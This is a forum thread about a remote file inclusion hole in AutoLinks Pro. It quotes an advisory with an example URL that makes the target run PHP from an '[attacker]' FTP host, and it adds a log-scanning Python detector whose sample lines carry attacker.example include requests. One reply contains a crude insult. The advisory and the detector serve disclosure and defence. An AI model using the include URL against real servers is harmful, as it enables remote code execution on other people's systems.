Autolinks Pro hacked - who knows help?
:helpme Hey guys,
there is a security vulnerability in Autolinks Pro. Hackers can get access to your server and install scripts to attack other servers.
http://www.securitytracker.com/alert...g/1014815.html
Anyone who has the same problems? Does anyone know a solution? Please help! :helpme
Peggy
ICQ: 307824338 |
We do not use php with our version of AG pro.
It's cgi ?? |
Set your register_globals off in php.ini. :thumbsup
|
Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.
The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
The flaw resides in 'autolinks/al_initialize.php'.
http://[target]/al_initialize.php?alpath=ftp://[attacker]/
The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system.
What's your website? :) |
|
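One way to check web-server access logs for the request pattern described in the advisory above, as an added example that is not part of the original thread or of AutoLinks Pro: it flags requests whose `alpath` parameter carries a URL instead of a local path. The log lines are constructed samples, and the Combined Log Format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme or stream wrapper (ftp://, http://, ...)
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)
# Parameter named in the advisory; extend for other include-path parameters
WATCHED_PARAMS = {"alpath"}


def suspicious_includes(log_lines):
    """Return (line_no, param, decoded_value) for watched params holding a URL."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes values, so alpath=ftp%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in WATCHED_PARAMS and REMOTE_RE.match(value):
                hits.append((line_no, name, value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:20:14:01 -0700] '
    '"GET /autolinks/al_initialize.php?alpath=ftp://attacker.example/ HTTP/1.0" 200 312',
    '203.0.113.9 - - [01/Jan/2024:20:15:40 -0700] '
    '"GET /autolinks/al_initialize.php?alpath=FTP%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:20:16:02 -0700] '
    '"GET /autolinks/al_initialize.php?alpath=./ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:20:16:09 -0700] '
    '"GET /index.php?page=2 HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for line_no, param, value in suspicious_includes(SAMPLE_LOG):
        print(f"line {line_no}: {param} = {value}")
```

Any hit means the script was asked to load its include path from another host and the server should be inspected for files it did not ship with.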
wow, basic shit ... retarded ...
|
FYI, this has nothing to do with register globals, vars are still picked up, it's just a remote include
|